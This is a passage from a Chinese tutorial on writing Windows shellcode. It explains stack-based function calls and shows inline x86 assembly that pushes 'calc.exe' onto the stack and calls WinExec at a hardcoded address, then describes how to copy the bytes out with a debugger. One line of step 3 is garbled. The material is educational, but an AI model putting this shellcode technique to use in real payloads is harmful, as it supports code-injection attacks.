因此WinExec真正的地址是7C8623AD,注意,这里是要反过来读取。
三、现在有了汇编模样的语句和WinExec的地址,接下来就是要转化为具有Shellcode的汇编代码。在转化汇编时先了解汇编下面是如何完成一个函数调用的:
1、父函数将函数的实参按照从右至左顺序压入堆栈;
2、CPU将父函数中函数调用指令Call XXXXXXXX的下一条指令地址EIP压入堆栈;
3、父函数通过Push Ebp将基地指针Ebp值东方钽业堆栈,并通过Mov Ebp,Esp指令将当前堆栈指针Esp值传给Ebp;
4、通过Sub Esp,m(m是字节数)指令可以为存放函数中的局部变量开辟内存。函数在执行的时候如果需要访问实参或局部变量,都可以通过EBP指针来指引完成。
根据汇编调用函数特点,并使用压栈的方法将参数传递进行,便可得到如下代码:
点击(此处)折叠或打开
#include "windows.h"
int main()
{
LoadLibraryA("kernel32.dll");//4c801d7b
//WinExec("calc.exe",SW_SHOW);
__asm
{
push ebp;
mov ebp,esp;
xor eax,eax;
push eax;
sub esp,08h;
mov byte ptr [ebp-0Ch],63h; //c
mov byte ptr [ebp-0Bh],61h; //a
mov byte ptr [ebp-0Ah],6Ch; //l
mov byte ptr [ebp-09h],63h; //c
mov byte ptr [ebp-08h],2Eh; //.
mov byte ptr [ebp-07h],65h; //e
mov byte ptr [ebp-06h],78h; //x
mov byte ptr [ebp-05h],65h; //e
lea eax,[ebp-0ch];
push eax; //将calc.exe压入栈内
mov eax,0x7C8623AD;
call eax; //调用WinExec
mov esp,ebp;
pop ebp;
}
return 0;
}
注意,字符串要以00H结束的哦,编译运行OK~~
四、到这里已经完成最难的部分了,接下来的工作即是将汇编在内存中的代码,即是Shellcode拷出来就是了。同样,在汇编代码任意一处下断点,让程序在断点处停下来,按Alt+8即可看到程序所在的内存地址,再按Alt+6调出内存窗口即可。